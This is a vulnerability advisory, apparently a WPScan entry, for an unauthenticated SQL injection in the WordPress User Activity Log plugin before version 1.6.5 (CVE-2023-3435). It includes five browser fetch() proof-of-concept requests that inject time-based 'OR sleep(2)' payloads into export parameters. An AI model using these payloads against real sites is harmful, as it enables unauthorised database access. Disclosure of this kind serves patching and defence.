Lucene search
Marc MontpasWPEX-ID:30A37A61-0D16-46F7-B9D8-721D983AFC6BHistoryJul 24, 2023 - 12:00 a.m.
User Activity Log < 1.6.5 - Unauthenticated SQLi
2023-07-2400:00:00
Marc Montpas
96
user activity log
unauthenticated
sql injection
EPSS
0.002
Percentile
61.4%
Description The plugin does not correctly sanitise and escape several parameters before using it in a SQL statement as part of its exportation feature, allowing unauthenticated attackers to conduct SQL injection attacks. Version 1.6.4 mitigates the issue for unauthenticated users but it is still exploitable by Subscribers and above.
Run any of the following fetch commands in a browser window and notice that they take several seconds to complete, demonstrating the SQL Injection vulnerability.
await fetch( '/wp-admin/admin-post.php?export=user_logs&export-nonce=abc&userrole=abc%22+OR+sleep(2)%23+' );
await fetch( '/wp-admin/admin-post.php?export=user_logs&export-nonce=abc&username=abc%27+OR+sleep(2)%23+' );
await fetch( '/wp-admin/admin-post.php?export=user_logs&export-nonce=abc&type=abc%27+OR+sleep(2)%23+' );
await fetch( '/wp-admin/admin-post.php?export=user_logs&export-nonce=abc&txtsearch=abc%27+OR+sleep(2)%23+' );
await fetch( '/wp-admin/admin-post.php?export=user_logs&export-nonce=abc&showip=abc%27+OR+sleep(2)%23+' );Related
wpvulndb
wpvulndb
User Activity Log < 1.6.5 - Unauthenticated SQLi
2023-07-24 00:00:00
cvelist
cvelist
CVE-2023-3435 User Activity Log < 1.6.5 - Unauthenticated SQLi
2023-08-14 19:10:19
cve
cve
CVE-2023-3435
2023-08-14 20:15:11
nvd
nvd
CVE-2023-3435
2023-08-14 20:15:11
prion
prion
Sql injection
2023-08-14 20:15:00
wordfence
wordfence